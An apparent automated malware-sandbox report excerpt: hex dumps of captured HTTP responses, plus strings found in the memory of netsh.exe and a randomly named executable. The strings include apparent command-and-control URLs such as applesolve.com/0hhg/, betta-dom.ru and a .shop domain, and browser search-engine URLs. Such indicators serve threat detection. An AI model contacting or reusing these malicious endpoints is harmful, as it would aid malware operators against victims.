31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.3.6expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 02 May 2024 06:26:36 GMTserver: LiteSpeedData Raw: 35 34 36 33 0d 0a f4 c2 1b a2 a8 aa fd 70 45 24 e9 ac 1e 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d4 fa f3 a4 6a 0e 77 04 9e 96 c9 04 80 48 6a b1 4d 8d dc 59 3d bd 64 ab 38 99 cd f2 a8 1e c9 47 0a 36 08 a0 01 50 a4 cc f0 6f e7 fb ff 5f 55 fb be 26 cf 71 d1 df a5 27 58 b3 00 84 48 80 b2 ad 17 bc 33 9b 66 5e f2 86 ac 03 82 20 85 31 49 f0 11 54 f0 d3 fa a7 aa da a2 ff 45 97 fe 7f df d4 ec c9 8d a9 f2 e9 5d a5 dc d1 58 12 dc 14 3a 87 98 ee bd ef 15 7f e6 4f 31 00 58 0c 08 16 00 c8 02 24 55 20 6c 60 ba ef de f7 de ff f3 67 06 44 92 16 04 15 98 56 4b 6e 24 a8 44 4a 4b 39 90 82 ce b1 a8 4d 92 9c 72 97 ca 90 29 6d c8 b6 2c e7 dc 74 1f 74 82 43 08 e5 1e 57 3a 2e 9a ca 8f f1 b3 cf ed ee 47 ce 40 44 40 50 5f 6d 19 9a d6 4b f7 8f 69 83 2c 04 08 d0 82 a4 8f a1 e5 7f bb 2f ed 4e 14 70 e1 88 20 de 3d 86 6a fb f7 6e 04 44 8d d4 e0 23 cb 50 b5 e9 d9 eb 5b 63 10 20 8e c5 b5 00 c5 c7 08 70 ae af 60 53 68 d5 e9 ab 9e 7c 4b ad e2 5f 3e d0 6b 4a ce 6f 31 5c 26 ff 45 1e c3 96 ee fb dd c6 4d d0 d0 e2 96 32 4b 8e a2 63 f6 a2 de b4 2d 7a 0a 23 3b 7a ff 45 c7 7d 09 0a b7 29 bd fe f3 b3 3f 91 bf 2a a9 1f 89 43 b5 a5 d6 99 5a 2a 9c ae b8 8d 3e 9f cf 9b d6 36 c2 b8 66 3e d4 7a 9e a6 f4 9a e4 fd bd 12 64 50 78 7d 1b 9c d1 40 b4 44 f2 64 7c 80 ff ff 3f 20 4f 1a 14 3e 49 a3 81 cc ce 2e b3 34 dd 90 d7 d6 2a bc 35 ea 88 07 41 73 2a b1 c7 b9 33 85 09 fe fc be d4 79 0b 03 97 2d 34 c8 77 e8 3e 1f fb fc 4a 18 8f 3a 27 f3 eb 67 58 1f 75 5e 69 cf 2f dd 7e 28 94 87 73 d4 df 72 e7 f3 39 58 ab d0 1b 75 44 51 9a 36 5f 1b b4 61 4e b4 84 20 8d 9e 37 10 fb 51 23 47 7d 7b cb 92 df 41 c3 ff ff 1f 79 22 bd 95 1e 5a 49 32 01 83 7b cb 79 8d 58 cd 29 1e a7 f3 d1 b4 a8 03 b8 27 64 0c 47 3a 58 a5 fe e8 08 d3 ae 9f 5d a8 fe 37 70 df 5b 6c cd 83 bc c5 10 a4 6e 3c d9 92 91 16 e0 f1 bb 53 34 67 8a 25 77 f3 dd dc 8b 5e 18 d7 ec b6 a9 d9 61 37 2f 8d c3 dd 1c c0 cf e1 6e 9e ae 44 22 16 bb f9 45 36 5c 64 bb 39 65 14 87 40 73 7a 1d 8c 2f 03 46 fd b1 81 d9 f0 c7 e6 3e e4 8f cd fb 6f 0f f6 c7 5b 32 9d 2b 91 e6 23 2d 8d 2e 21 64 a5 32 e0 43 60 8a ed bb 79 6f b9 06 18 dc cd 1f 7c 20 64 fc a6 73 87 0a c1 a3 68 a5 16 0f fe e7 23 ba ed 5a ac 44 46 a7 69 f3 6c fe e2 f9 41 1b ce af 96 0a 89 f4 04 ba 60 f8 c1 01 9e 15 2b f2 62 fe ec f9 d6 3f af 30 92 4c c7 e3 11 1c 31 cc 33 dc c4 ed 48 ca 08 e3 31 b8 53 fc a6 b0 1d 0f 6c b8 c7 37 f4 c1 e7 c8 ba 91 5a ae ac 37 c4 e2 3c 78 bf 1b 3e d7 51 3c 6d 3c 7a 2f 8d be 0d c6 41 83 c2 63 f8 35 60 1b 19 f6 db ed e7 4f c2 07 27 75 23 eb 53 14 e2 78 d2 ca 9b c6 69 42 e1 ce da 08 59 60 3a 1e 51 1c 9e fa 76 7c c5 32 44 09 4b 18 8a 12 f4 11 bc 50 18 36 c8 1c db f2 76 c5 0c 45 2d 95 f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.3.6expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 02 May 2024 06:26:38 GMTserver: LiteSpeedData Raw: 35 34 36 33 0d 0a f4 c2 1b a2 a8 aa fd 70 45 24 e9 ac 1e 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d4 fa f3 a4 6a 0e 77 04 9e 96 c9 04 80 48 6a b1 4d 8d dc 59 3d bd 64 ab 38 99 cd f2 a8 1e c9 47 0a 36 08 a0 01 50 a4 cc f0 6f e7 fb ff 5f 55 fb be 26 cf 71 d1 df a5 27 58 b3 00 84 48 80 b2 ad 17 bc 33 9b 66 5e f2 86 ac 03 82 20 85 31 49 f0 11 54 f0 d3 fa a7 aa da a2 ff 45 97 fe 7f df d4 ec c9 8d a9 f2 e9 5d a5 dc d1 58 12 dc 14 3a 87 98 ee bd ef 15 7f e6 4f 31 00 58 0c 08 16 00 c8 02 24 55 20 6c 60 ba ef de f7 de ff f3 67 06 44 92 16 04 15 98 56 4b 6e 24 a8 44 4a 4b 39 90 82 ce b1 a8 4d 92 9c 72 97 ca 90 29 6d c8 b6 2c e7 dc 74 1f 74 82 43 08 e5 1e 57 3a 2e 9a ca 8f f1 b3 cf ed ee 47 ce 40 44 40 50 5f 6d 19 9a d6 4b f7 8f 69 83 2c 04 08 d0 82 a4 8f a1 e5 7f bb 2f ed 4e 14 70 e1 88 20 de 3d 86 6a fb f7 6e 04 44 8d d4 e0 23 cb 50 b5 e9 d9 eb 5b 63 10 20 8e c5 b5 00 c5 c7 08 70 ae af 60 53 68 d5 e9 ab 9e 7c 4b ad e2 5f 3e d0 6b 4a ce 6f 31 5c 26 ff 45 1e c3 96 ee fb dd c6 4d d0 d0 e2 96 32 4b 8e a2 63 f6 a2 de b4 2d 7a 0a 23 3b 7a ff 45 c7 7d 09 0a b7 29 bd fe f3 b3 3f 91 bf 2a a9 1f 89 43 b5 a5 d6 99 5a 2a 9c ae b8 8d 3e 9f cf 9b d6 36 c2 b8 66 3e d4 7a 9e a6 f4 9a e4 fd bd 12 64 50 78 7d 1b 9c d1 40 b4 44 f2 64 7c 80 ff ff 3f 20 4f 1a 14 3e 49 a3 81 cc ce 2e b3 34 dd 90 d7 d6 2a bc 35 ea 88 07 41 73 2a b1 c7 b9 33 85 09 fe fc be d4 79 0b 03 97 2d 34 c8 77 e8 3e 1f fb fc 4a 18 8f 3a 27 f3 eb 67 58 1f 75 5e 69 cf 2f dd 7e 28 94 87 73 d4 df 72 e7 f3 39 58 ab d0 1b 75 44 51 9a 36 5f 1b b4 61 4e b4 84 20 8d 9e 37 10 fb 51 23 47 7d 7b cb 92 df 41 c3 ff ff 1f 79 22 bd 95 1e 5a 49 32 01 83 7b cb 79 8d 58 cd 29 1e a7 f3 d1 b4 a8 03 b8 27 64 0c 47 3a 58 a5 fe e8 08 d3 ae 9f 5d a8 fe 37 70 df 5b 6c cd 83 bc c5 10 a4 6e 3c d9 92 91 16 e0 f1 bb 53 34 67 8a 25 77 f3 dd dc 8b 5e 18 d7 ec b6 a9 d9 61 37 2f 8d c3 dd 1c c0 cf e1 6e 9e ae 44 22 16 bb f9 45 36 5c 64 bb 39 65 14 87 40 73 7a 1d 8c 2f 03 46 fd b1 81 d9 f0 c7 e6 3e e4 8f cd fb 6f 0f f6 c7 5b 32 9d 2b 91 e6 23 2d 8d 2e 21 64 a5 32 e0 43 60 8a ed bb 79 6f b9 06 18 dc cd 1f 7c 20 64 fc a6 73 87 0a c1 a3 68 a5 16 0f fe e7 23 ba ed 5a ac 44 46 a7 69 f3 6c fe e2 f9 41 1b ce af 96 0a 89 f4 04 ba 60 f8 c1 01 9e 15 2b f2 62 fe ec f9 d6 3f af 30 92 4c c7 e3 11 1c 31 cc 33 dc c4 ed 48 ca 08 e3 31 b8 53 fc a6 b0 1d 0f 6c b8 c7 37 f4 c1 e7 c8 ba 91 5a ae ac 37 c4 e2 3c 78 bf 1b 3e d7 51 3c 6d 3c 7a 2f 8d be 0d c6 41 83 c2 63 f8 35 60 1b 19 f6 db ed e7 4f c2 07 27 75 23 eb 53 14 e2 78 d2 ca 9b c6 69 42 e1 ce da 08 59 60 3a 1e 51 1c 9e fa 76 7c c5 32 44 09 4b 18 8a 12 f4 11 bc 50 18 36 c8 1c db f2 76 c5 0c 45 2d 95 f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.3.6expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 02 May 2024 06:26:41 GMTserver: LiteSpeedData Raw: 35 34 36 33 0d 0a f4 c2 1b a2 a8 aa fd 70 45 24 e9 ac 1e 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d4 fa f3 a4 6a 0e 77 04 9e 96 c9 04 80 48 6a b1 4d 8d dc 59 3d bd 64 ab 38 99 cd f2 a8 1e c9 47 0a 36 08 a0 01 50 a4 cc f0 6f e7 fb ff 5f 55 fb be 26 cf 71 d1 df a5 27 58 b3 00 84 48 80 b2 ad 17 bc 33 9b 66 5e f2 86 ac 03 82 20 85 31 49 f0 11 54 f0 d3 fa a7 aa da a2 ff 45 97 fe 7f df d4 ec c9 8d a9 f2 e9 5d a5 dc d1 58 12 dc 14 3a 87 98 ee bd ef 15 7f e6 4f 31 00 58 0c 08 16 00 c8 02 24 55 20 6c 60 ba ef de f7 de ff f3 67 06 44 92 16 04 15 98 56 4b 6e 24 a8 44 4a 4b 39 90 82 ce b1 a8 4d 92 9c 72 97 ca 90 29 6d c8 b6 2c e7 dc 74 1f 74 82 43 08 e5 1e 57 3a 2e 9a ca 8f f1 b3 cf ed ee 47 ce 40 44 40 50 5f 6d 19 9a d6 4b f7 8f 69 83 2c 04 08 d0 82 a4 8f a1 e5 7f bb 2f ed 4e 14 70 e1 88 20 de 3d 86 6a fb f7 6e 04 44 8d d4 e0 23 cb 50 b5 e9 d9 eb 5b 63 10 20 8e c5 b5 00 c5 c7 08 70 ae af 60 53 68 d5 e9 ab 9e 7c 4b ad e2 5f 3e d0 6b 4a ce 6f 31 5c 26 ff 45 1e c3 96 ee fb dd c6 4d d0 d0 e2 96 32 4b 8e a2 63 f6 a2 de b4 2d 7a 0a 23 3b 7a ff 45 c7 7d 09 0a b7 29 bd fe f3 b3 3f 91 bf 2a a9 1f 89 43 b5 a5 d6 99 5a 2a 9c ae b8 8d 3e 9f cf 9b d6 36 c2 b8 66 3e d4 7a 9e a6 f4 9a e4 fd bd 12 64 50 78 7d 1b 9c d1 40 b4 44 f2 64 7c 80 ff ff 3f 20 4f 1a 14 3e 49 a3 81 cc ce 2e b3 34 dd 90 d7 d6 2a bc 35 ea 88 07 41 73 2a b1 c7 b9 33 85 09 fe fc be d4 79 0b 03 97 2d 34 c8 77 e8 3e 1f fb fc 4a 18 8f 3a 27 f3 eb 67 58 1f 75 5e 69 cf 2f dd 7e 28 94 87 73 d4 df 72 e7 f3 39 58 ab d0 1b 75 44 51 9a 36 5f 1b b4 61 4e b4 84 20 8d 9e 37 10 fb 51 23 47 7d 7b cb 92 df 41 c3 ff ff 1f 79 22 bd 95 1e 5a 49 32 01 83 7b cb 79 8d 58 cd 29 1e a7 f3 d1 b4 a8 03 b8 27 64 0c 47 3a 58 a5 fe e8 08 d3 ae 9f 5d a8 fe 37 70 df 5b 6c cd 83 bc c5 10 a4 6e 3c d9 92 91 16 e0 f1 bb 53 34 67 8a 25 77 f3 dd dc 8b 5e 18 d7 ec b6 a9 d9 61 37 2f 8d c3 dd 1c c0 cf e1 6e 9e ae 44 22 16 bb f9 45 36 5c 64 bb 39 65 14 87 40 73 7a 1d 8c 2f 03 46 fd b1 81 d9 f0 c7 e6 3e e4 8f cd fb 6f 0f f6 c7 5b 32 9d 2b 91 e6 23 2d 8d 2e 21 64 a5 32 e0 43 60 8a ed bb 79 6f b9 06 18 dc cd 1f 7c 20 64 fc a6 73 87 0a c1 a3 68 a5 16 0f fe e7 23 ba ed 5a ac 44 46 a7 69 f3 6c fe e2 f9 41 1b ce af 96 0a 89 f4 04 ba 60 f8 c1 01 9e 15 2b f2 62 fe ec f9 d6 3f af 30 92 4c c7 e3 11 1c 31 cc 33 dc c4 ed 48 ca 08 e3 31 b8 53 fc a6 b0 1d 0f 6c b8 c7 37 f4 c1 e7 c8 ba 91 5a ae ac 37 c4 e2 3c 78 bf 1b 3e d7 51 3c 6d 3c 7a 2f 8d be 0d c6 41 83 c2 63 f8 35 60 1b 19 f6 db ed e7 4f c2 07 27 75 23 eb 53 14 e2 78 d2 ca 9b c6 69 42 e1 ce da 08 59 60 3a 1e 51 1c 9e fa 76 7c c5 32 44 09 4b 18 8a 12 f4 11 bc 50 18 36 c8 1c db f2 76 c5 0c 45 2d 95 f
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:27:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:28:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:28:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
Source: netsh.exe, 00000004.00000002.4124592339.0000000004C52000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000004062000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000036F6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bnbuotqakx.shop
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bnbuotqakx.shop/0hhg/
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netsh.exe, 00000004.00000002.4124592339.000000000492E000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003D3E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Noto
